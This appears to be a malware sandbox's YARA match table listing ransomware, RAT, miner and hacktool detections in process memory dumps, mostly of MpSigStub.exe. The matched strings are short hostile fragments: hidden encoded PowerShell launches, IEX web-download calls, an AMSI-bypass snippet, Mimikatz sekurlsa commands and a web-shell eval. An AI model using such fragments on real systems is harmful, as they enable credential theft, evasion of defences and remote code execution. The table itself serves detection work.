00000026.00000003.18431448870.00000138BE186000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x207a7:$s1: stratum+tcp://
00000026.00000003.18431448870.00000138BE186000.00000004.00000001.sdmp	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
00000026.00000003.18311707231.00000138BDDEB000.00000004.00000001.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x7674:$sb1: -W hidden 0x766f:$sc1: -nop 0x767e:$sd2: -noninteractive 0x7662:$se2: -exec bypass 0x7662:$se4: -exec bypass
00000026.00000003.18311707231.00000138BDDEB000.00000004.00000001.sdmp	JoeSecurity_Growtopia	Yara detected Growtopia	Joe Security
00000026.00000003.18306077924.00000138BCEEA000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18437333856.00000138BE03B000.00000004.00000001.sdmp	SUSP_Script_Obfuscation_Char_Concat	Detects strings found in sample from CN group repo leak in October 2018	Florian Roth	0x17a45:$s1: "c" & "r" & "i" & "p" & "t"
00000026.00000003.18437333856.00000138BE03B000.00000004.00000001.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x3b8b7:$sa2: -enCodEdCoMMANd 0xcd09:$sb1: -w hidden 0x3b8a3:$sb3: -WindOwsTyLe HiddEN 0x3b898:$sc2: -NOPrOFiLe 0x3b880:$se3: -ExECutioNPolicy bYpAsS
00000026.00000003.18437333856.00000138BE03B000.00000004.00000001.sdmp	JoeSecurity_cerber	Yara detected Cerber ransomware	Joe Security
00000026.00000003.18437333856.00000138BE03B000.00000004.00000001.sdmp	JoeSecurity_Clop	Yara detected Clop Ransomware	Joe Security
00000026.00000003.18437333856.00000138BE03B000.00000004.00000001.sdmp	JoeSecurity_Nemty	Yara detected Nemty Ransomware	Joe Security
00000026.00000003.18351208505.00000138BD776000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xf8b6:$s1: stratum+tcp://
00000026.00000003.18351208505.00000138BD776000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18315232073.00000138BDD67000.00000004.00000001.sdmp	HackTool_Samples	Hacktool	unknown	0x31ba2:$c: Failed to load SAM functions
00000026.00000003.18315232073.00000138BDD67000.00000004.00000001.sdmp	PS_AMSI_Bypass	Detects PowerShell AMSI Bypass	Florian Roth	0x8128:$s1: .getfield('amsicontext',[reflection.bindingflags]'nonpublic,static').
00000026.00000003.18315232073.00000138BDD67000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18432672691.00000138BDF33000.00000004.00000001.sdmp	JoeSecurity_cerber	Yara detected Cerber ransomware	Joe Security
00000026.00000003.18349361933.00000138BD221000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	hacktool_macos_keylogger_logkext	LogKext is an open source keylogger for Mac OS X, a product of FSB software.	@mimeframe	0x42ce8:$a1: logKextPassKey 0x9f5e39:$a2: Couldn't get system keychain: 0x4107b:$a4: com_fsb_iokit_logKext 0x1ed7fe:$b1: logKext Password: 0x1ed810:$b2: Logging controls whether the daemon is logging keystrokes (default is on). 0x1ed85c:$b2: Logging controls whether the daemon is logging keystrokes (default is on). 0x42ce8:$c1: logKextPassKey
Process Memory Space: MpSigStub.exe PID: 4180	Msfpayloads_msf_psh	Metasploit Payloads - file msf-psh.vba	Florian Roth	0x2d76f0:$s1: powershell.exe -nop -w hidden -e 0x431202:$s1: powershell.exe -nop -w hidden -e 0x431240:$s1: powershell.exe -nop -w hidden -e 0x50c5e:$s2: Call Shell( 0x364d1f:$s2: Call Shell( 0x432430:$s2: Call Shell( 0x43245a:$s2: Call Shell( 0x1b0cc3:$s3: Sub Workbook_Open()
Process Memory Space: MpSigStub.exe PID: 4180	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0x6648fb:$xs1: WS2_32.dll 0x2eb2f2:$xs2: ReflectiveLoader 0x7a2ddc:$xs2: ReflectiveLoader 0x7a2dfd:$xs2: ReflectiveLoader 0xaca563:$xs2: ReflectiveLoader 0xace288:$xs2: ReflectiveLoader 0xace2a8:$xs2: ReflectiveLoader 0xace2dc:$xs2: ReflectiveLoader
Process Memory Space: MpSigStub.exe PID: 4180	Base64_PS1_Shellcode	Detects Base64 encoded PS1 Shellcode	Nick Carr, David Ledbetter	0xaca7e1:$substring: AAAAYInlM 0xaca7dd:$pattern1: /OiCAAAAYInlM
Process Memory Space: MpSigStub.exe PID: 4180	SUSP_PowerShell_Caret_Obfuscation_2	Detects powershell keyword obfuscated with carets	Florian Roth	0x1ce4eb:$r1: p^o^w^e^r^s^h^E^L^L 0x1ce4eb:$r2: p^o^w^e^r^s^h^E^L^L 0x2812c6:$r2: p^ower^shell 0x2812fa:$r2: p^ower^shell 0x7e641a:$r2: p^owershell
Process Memory Space: MpSigStub.exe PID: 4180	Tofu_Backdoor	Detects Tofu Trojan	Cylance	0x532197:$a: Cookies: Sym1.0 0x5321f6:$b: \\.\pipe\1[12345678]
Process Memory Space: MpSigStub.exe PID: 4180	Hacktool_Strings_p0wnedShell	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs	Florian Roth	0x49f8b8:$x3: lsadump::dcsync 0x4857a9:$x7: Invoke-Mimikatz 0x4858a7:$x9: Invoke-ReflectivePEInjection
Process Memory Space: MpSigStub.exe PID: 4180	Keylogger_CN_APT	Keylogger - generic rule for a Chinese variant	Florian Roth	0x1d69f9:$s3: shutdown.exe -r -t 0 0x70aa3f:$s5: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; 0x70aaba:$s5: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; 0x2c9fe1:$s7: User Agent\Post Platform\ 0x2ca051:$s7: User Agent\Post Platform\
Process Memory Space: MpSigStub.exe PID: 4180	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x9ef998:$s2: system.net.webclient).downloadstring('http 0x9ef9fc:$s2: system.net.webclient).downloadstring('http
Process Memory Space: MpSigStub.exe PID: 4180	ZxShell_Jul17	Detects a ZxShell - CN threat group	Florian Roth	0x51f60:$x1: zxplug -add 0x51f6c:$x2: getxxx c:\xyz.dll 0x7ce3aa:$x13: c:\windows\keylog.txt
Process Memory Space: MpSigStub.exe PID: 4180	WindowsCredentialEditor	Windows Credential Editor	unknown	0x57eaf9:$a: extract the TGT session key 0x47a931:$b: Windows Credentials Editor
Process Memory Space: MpSigStub.exe PID: 4180	Amplia_Security_Tool	Amplia Security Tool	unknown	0x57ea3e:$a: Amplia Security 0x57eaf9:$e: extract the TGT session key
Process Memory Space: MpSigStub.exe PID: 4180	HackTool_Samples	Hacktool	unknown	0x82ff7b:$i: WPE-C1467211-7C89-49c5-801A-1D048E4014C4
Process Memory Space: MpSigStub.exe PID: 4180	Ammyy_Admin_AA_v3	Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe	Florian Roth	0x7f7790:$x1: S:\Ammyy\sources\target\TrService.cpp 0x7f77b6:$x2: S:\Ammyy\sources\target\TrDesktopCopyRect.cpp 0x7f77e4:$x3: Global\Ammyy.Target.IncomePort 0x7f7803:$x4: S:\Ammyy\sources\target\TrFmFileSys.cpp 0x7f782b:$x5: Please enter password for accessing remote computer 0x7f76d0:$s1: CreateProcess1()#3 %d error=%d 0x7f76f1:$s2: CHttpClient::SendRequest2(%s, %s, %d) error: invalid host name. 0x7f7733:$s3: ERROR: CreateProcessAsUser() error=%d, session=%d 0x7f7767:$s4: ERROR: FindProcessByName('explorer.exe')
Process Memory Space: MpSigStub.exe PID: 4180	RemCom_RemoteCommandExecution	Detects strings from RemCom tool	Florian Roth	0xc2d0b:$: \\.\pipe\%s%s%d
Process Memory Space: MpSigStub.exe PID: 4180	SUSP_Script_Obfuscation_Char_Concat	Detects strings found in sample from CN group repo leak in October 2018	Florian Roth	0x432b47:$s1: "c" & "r" & "i" & "p" & "t"
Process Memory Space: MpSigStub.exe PID: 4180	SUSP_PowerShell_IEX_Download_Combo	Detects strings found in sample from CN group repo leak in October 2018	Florian Roth	0x19a508:$x1: IEX ((new-object net.webclient).download 0x48e921:$x1: IEX ((new-object net.webclient).download 0x7e5221:$x1: iex ((new-object net.webclient).Download
Process Memory Space: MpSigStub.exe PID: 4180	Unidentified_Malware_Two	Unidentified Implant by APT29	US CERT	0x5a1517:$my_string_five: fuckyou1 0x5a1524:$my_string_five: fuckyou1 0x447103:$my_string_six: xtool.exe
Process Memory Space: MpSigStub.exe PID: 4180	APT_MAL_Sandworm_Exaramel_Configuration_Key	Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...	FR/ANSSI/SDO	0x79b7ed:$: odhyrfjcnfkdtslt 0x79b7fe:$: odhyrfjcnfkdtslt
Process Memory Space: MpSigStub.exe PID: 4180	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x4daeab:$s05: fce8890000006089e531d2648b52308b
Process Memory Space: MpSigStub.exe PID: 4180	Pupy_Backdoor	Detects Pupy backdoor	Florian Roth	0x741b9c:$x1: reflectively inject a dll into a process. 0x63dd:$x4: reflective_inject_dll 0x641b:$x4: reflective_inject_dll 0x741b86:$x4: reflective_inject_dll 0x741c14:$x4: reflective_inject_dll 0xace1e2:$x4: reflective_inject_dll 0x63dd:$x8: reflective_inject_dll 0x641b:$x8: reflective_inject_dll 0x741b86:$x8: reflective_inject_dll 0x741c14:$x8: reflective_inject_dll 0xace1e2:$x8: reflective_inject_dll 0x63dd:$x9: reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits) 0x641b:$x9: reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits)
Process Memory Space: MpSigStub.exe PID: 4180	TA17_293A_malware_1	inveigh pen testing tools & related artifacts	US-CERT Code Analysis Team (modified by Florian Roth)	0x145a1:$n1: file:// 0x2eb83:$n1: file:// 0x32a5c:$n1: file:// 0x33df4:$n1: file:// 0x33e21:$n1: file:// 0x142207:$n1: file:// 0x142224:$n1: file:// 0x142241:$n1: file:// 0x142268:$n1: file:// 0x142608:$n1: file:// 0x18d4b4:$n1: file:// 0x1983ea:$n1: file:// 0x19841f:$n1: file:// 0x1985b4:$n1: file:// 0x2035ef:$n1: file:// 0x30b4b7:$n1: file:// 0x355a60:$n1: file:// 0x355a93:$n1: file:// 0x355b2e:$n1: file:// 0x355b4c:$n1: file:// 0x365326:$n1: file://
Process Memory Space: MpSigStub.exe PID: 4180	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x16d047:$s1: sekurlsa::msv 0x49f888:$s2: sekurlsa::wdigest 0x58ad3c:$s2: sekurlsa::wdigest 0x49f865:$s4: sekurlsa::kerberos 0x65d6f5:$s4: sekurlsa::kerberos 0x49f82a:$s5: sekurlsa::tspkg 0x49f818:$s6: sekurlsa::livessp 0x58ad4f:$s6: sekurlsa::livessp 0x16d063:$s7: sekurlsa::ssp 0x49f806:$s9: sekurlsa::process 0x65d6b6:$s9: sekurlsa::process 0x16d055:$s11: sekurlsa::pth 0x49f83a:$s12: sekurlsa::tickets 0x65d6c9:$s12: sekurlsa::tickets 0x49f878:$s13: sekurlsa::ekeys 0x49f7cd:$s14: sekurlsa::dpapi 0x49f7bb:$s15: sekurlsa::credman 0x65d678:$s15: sekurlsa::credman
Process Memory Space: MpSigStub.exe PID: 4180	HackTool_MSIL_SharPersist_2	unknown	FireEye	0x644fd8:$a1: SharPersist.lib 0x644fe8:$a2: SharPersist.exe 0x644ff8:$b1: ERROR: Invalid hotkey location option given. 0x645025:$b2: ERROR: Invalid hotkey given. 0x645042:$b3: ERROR: Keepass configuration file not found. 0x64506f:$b4: ERROR: Keepass configuration file was not found. 0x6450a0:$b5: ERROR: That value already exists in: 0x6450c5:$b6: ERROR: Failed to delete hidden registry key. 0x6450f2:$pdb1: \SharPersist\ 0x645100:$pdb2: \SharPersist.pdb 0x645111:$pdb2: \SharPersist.pdb
Process Memory Space: MpSigStub.exe PID: 4180	CredTheft_MSIL_ADPassHunt_2	unknown	FireEye	0x1c347:$pdb1: \ADPassHunt\ 0x1c354:$pdb2: \ADPassHunt.pdb 0x1c364:$s1: Usage: .\ADPassHunt.exe 0x1c37c:$s2: [ADA] Searching for accounts with msSFU30Password attribute 0x1c3b8:$s3: [ADA] Searching for accounts with userpassword attribute 0x1c3f1:$s4: [GPP] Searching for passwords now 0x1c413:$s4: [GPP] Searching for passwords now 0x741d6e:$s4: [GPP] Searching for passwords now
Process Memory Space: MpSigStub.exe PID: 4180	APT_Backdoor_Win_GoRat_Memory	Identifies GoRat malware in memory based on strings.	FireEye	0x2d06a2:$rat1: rat/modules/socks.(HTTPProxyClient).beacon 0x2d0587:$rat2: rat.(Core).generateBeacon 0x2d05a2:$rat3: rat.gJitter 0x2d05af:$rat4: rat/comms.(protectedChannel).SendCmdResponse 0x2d0613:$rat6: rat/modules/latlisten.(latlistensrv).handleCmd 0x2d0679:$rat8: rat/modules/netsweeper.(Pinger).listen 0x2d06a2:$rat9: rat/modules/socks.(HTTPProxyClient).beacon 0x2d06cf:$rat10: rat/platforms/win/dyloader.(memoryLoader).ExecutePluginFunction 0x2d0560:$winblows: rat/platforms/win.(winblows).GetStage
Process Memory Space: MpSigStub.exe PID: 4180	ChinaChopper_Generic	China Chopper Webshells - PHP and ASPX	Florian Roth	0x19ae7f:$php: php @eval($_POST[
Process Memory Space: MpSigStub.exe PID: 4180	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x11de33:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x11de43:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x11de8d:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x11de9d:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x11e0ea:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x11e11a:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x11e12a:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x11e148:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x11e178:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x11e188:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x11e438:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x11e448:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x11e49a:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x11e4aa:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x798d6c:$x1: 78 34 4E 6A 4E 63 65 44 63 79 58 48 67 0x798d96:$x1: 78 34 4E 6A 4E 63 65 44 63 79 58 48 67 0x79947c:$x1: 78 34 4E 54 4E 63 65 44 59 7A 58 48 67 0x79948c:$x1: 78 34 4E 6A 6C 63 65 44 63 77 58 48 67 0x7994aa:$x1: 78 34 4E 54 4E 63 65 44 59 7A 58 48 67 0x7994ba:$x1: 78 34 4E 6A 6C 63 65 44 63 77 58 48 67 0xa2aa51:$x1: 78 34 4E 54 64 63 65 44 55 7A 58 48 67
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_blackmoon	Yara detected BlackMoon Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_cerber	Yara detected Cerber ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Buran	Yara detected Buran Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Meterpreter	Yara detected Meterpreter	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Valak_1	Yara detected Valak	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_RevengeRAT	Yara detected RevengeRAT	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_rapid	Yara detected Rapid ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_AESCRYPTRansomware	Yara detected AESCRYPT Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Vidar	Yara detected Vidar stealer	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_gogoogle	Yara detected GoGoogle ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Ragnarok_ransomware	Yara detected Ragnarok ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Codoso_Ghost	Yara detected Codoso Ghost	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Axiom	Yara detected Axiom Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Hancitor	Yara detected Hancitor	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_rhino	Yara detected Rhino ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Voidcrypt	Yara detected Voidcrypt Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_WormLocker	Yara detected WormLocker Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_DarkSide	Yara detected DarkSide Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_ByteLocker	Yara detected ByteLocker Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Arcane	Yara detected Arcane Stealer	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Baldr	Yara detected Baldr	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_TeslaCrypt	Yara detected TeslaCrypt Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Clay	Yara detected Clay Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_OCT_RANSOMWARE	Yara detected OCT Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Mailto	Yara detected Mailto ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Pony	Yara detected Pony	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_MegaCortex	Yara detected MegaCortex Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_MiniRAT	Yara detected Mini RAT	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Clop	Yara detected Clop Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_crypt_ransomware	Yara detected Crypt ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Ouroboros_ransomware	Yara detected Ouroboros ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_jcrypt	Yara detected Jcrypt Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Niros	Yara detected Niros Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_LaZagne	Yara detected LaZagne password dumper	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Knot	Yara detected Knot Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_NoCry	Yara detected NoCry Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Koadic	Yara detected Koadic	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_EvilGnomeRC5Key	Yara detected Linux EvilGnome RC5 key	unknown
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_LockBit_ransomware	Yara detected LockBit ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Zeppelin	Yara detected Zeppelin Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Ryuk	Yara detected Ryuk ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Artemon	Yara detected Artemon Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Delta	Yara detected Delta Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_MSIL_Load_Encrypted_Assembly	Yara detected MSIL_Load_Encrypted_Assembly	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Evrial	Yara detected Evrial Stealer	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Nemty	Yara detected Nemty Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_CryLock	Yara detected CryLock ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Growtopia	Yara detected Growtopia	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_lockfile	Yara detected LOCKFILE ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Ransomware32	Yara detected Ransomware32	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Winexe_tool	Yara detected Winexe tool	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_blackmatter	Yara detected BLACKMatter Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Marvel	Yara detected Marvel Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Chaos	Yara detected Chaos Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_ransomware_0x0M4R	Yara detected 0x0M4R Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_NetWire_1	Yara detected NetWire RAT	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Gocoder_3	Yara detected Gocoder ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_WannaRen	Yara detected WannaRen ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Gocoder	Yara detected Gocoder ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_LimeRAT	Yara detected LimeRAT	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Parallax_RAT	Yara detected Parallax RAT	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Nephilim	Yara detected Nephilim Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_babuk	Yara detected Babuk Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_vhd	Yara detected VHD ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Netwalker	Yara detected Netwalker ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_RekenSom	Yara detected RekenSom ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_RemComRemoteAdmin	Yara detected RemCom RemoteAdmin tool	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Shellcode_Injector	Yara detected generic Shellcode Injector	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_lazparking	Yara detected LazParking Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Jigsaw	Yara detected Jigsaw	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_WinSecDisabler	Yara detected Windows Security Disabler	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Snatch	Yara detected Snatch Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Cute	Yara detected Cute Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_apis	Yara detected Apis Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_fiesta	Yara detected Fiesta Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_CryptoWall	Yara detected CryptoWall ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_mock	Yara detected Mock Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Amnesia	Yara detected Amnesia ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_PornRansomware	Yara detected Porn Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_RegretLocker	Yara detected RegretLocker Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Ransomware_Generic	Yara detected Ransomware_Generic	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Zeoticus_ransomware	Yara detected Zeoticus ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Thanos	Yara detected Thanos ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_covid19	Yara detected Covid19 Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Cobra_Locker	Yara detected Cobra Locker ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_PasteDownloader	Yara detected PasteDownloader	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_hidden_tear	Yara detected HiddenTear ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_VB6DownloaderGeneric	Yara detected VB6 Downloader Generic	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	JoeSecurity_Predator	Yara detected Predator	Joe Security
Process Memory Space: MpSigStub.exe PID: 4180	vanquish_2	Webshells Auto-generated - file vanquish.exe	Yara Bulk Rule Generator by Florian Roth	0xadc5a2:$s2: Vanquish - DLL injection failed: 0xadc5c4:$s2: Vanquish - DLL injection failed:
